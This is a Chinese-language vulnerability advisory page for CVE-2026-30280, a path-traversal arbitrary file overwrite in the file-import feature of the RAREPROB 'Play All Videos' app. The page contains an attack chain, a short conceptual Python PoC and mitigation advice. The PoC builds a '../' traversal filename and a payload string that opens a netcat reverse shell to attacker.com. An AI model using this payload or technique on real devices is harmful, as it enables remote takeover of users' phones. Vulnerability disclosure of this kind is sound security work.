IPBUF安全漏洞报告
English
CVE-2026-30280 CVSS 5.3 中危

CVE-2026-30280: Play All Videos 任意文件覆盖漏洞

披露日期: 2026-03-31
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-30280
漏洞类型
任意文件覆盖
CVSS评分
5.3 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
RAREPROB Video player Play All Videos

相关标签

任意文件覆盖路径遍历代码执行RAREPROB本地漏洞

漏洞概述

RAREPROB SOLUTIONS PRIVATE LIMITED 开发的 Video player Play All Videos v1.0.135 版本中存在任意文件覆盖漏洞。该漏洞产生于应用程序的文件导入功能,由于缺乏严格的路径验证,攻击者可以覆盖系统内的关键内部文件。攻击者可利用该漏洞实现任意代码执行或造成敏感信息泄露,从而威胁用户的数据安全和系统稳定性。

技术细节

该漏洞的 CVSS 向量为 CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L,表明攻击需要本地访问且需要用户交互,无需预先认证。漏洞原理在于应用程序处理文件导入请求时,未对文件名或路径进行充分的校验和过滤。攻击者可以构造包含路径遍历字符(如 `../`)或绝对路径的恶意文件,在用户导入该文件时,将其写入应用程序预期之外的目录位置。通过覆盖配置文件、库文件或执行脚本,攻击者可以在目标系统上触发任意代码执行。此外,覆盖日志文件或数据库文件可能导致信息泄露或拒绝服务,尽管当前评分主要侧重于代码执行风险。

攻击链分析

STEP 1
侦察
攻击者确认目标设备上安装了 RAREPROB Video player Play All Videos v1.0.135。
STEP 2
资源制作
攻击者构造一个特制的文件,文件名包含路径遍历序列(如 ../)以指向敏感系统文件,内容包含恶意代码或错误配置。
STEP 3
投递
攻击者通过社会工程学手段诱导受害者下载该文件,并在应用中选择“导入”功能打开它。
STEP 4
利用
应用处理导入请求时,由于未过滤文件名,将文件内容写入指定路径,覆盖关键内部文件。
STEP 5
执行与影响
应用在下次启动或加载配置时执行被覆盖的恶意代码,导致信息泄露或任意代码执行。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import os # PoC Concept for Arbitrary File Overwrite # This script demonstrates how to craft a file intended to overwrite a critical config. # Target file path (Path Traversal) # Assuming the app runs in a sandboxed environment but fails to sanitize paths. # Example target: shared_prefs or a library file. malicious_filename = "../../data/data/com.rareprob.playall/files/malicious_config.xml" # Malicious content to be written payload = "<config><execute>system('nc -e /bin/sh attacker.com 4444')</execute></config>" # Simulating the file creation process that would occur before import print(f"[*] Creating malicious file: {malicious_filename}") print(f"[*] Payload content prepared: {payload}") # In a real attack scenario: # 1. The attacker places this file in a location the app can read (e.g., Downloads). # 2. The attacker tricks the user into using the 'Import' feature of the app. # 3. The app reads the filename without sanitization and overwrites the target file. print("[!] If imported by the vulnerable app, critical files will be overwritten.")

影响范围

Video player Play All Videos 1.0.135

防御指南

临时缓解措施
建议用户暂时停止使用该软件的文件导入功能,或仅从可信来源导入文件。同时,限制应用程序对关键系统目录的写入权限,以减少潜在的损害。关注官方发布的安全更新并及时安装补丁。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表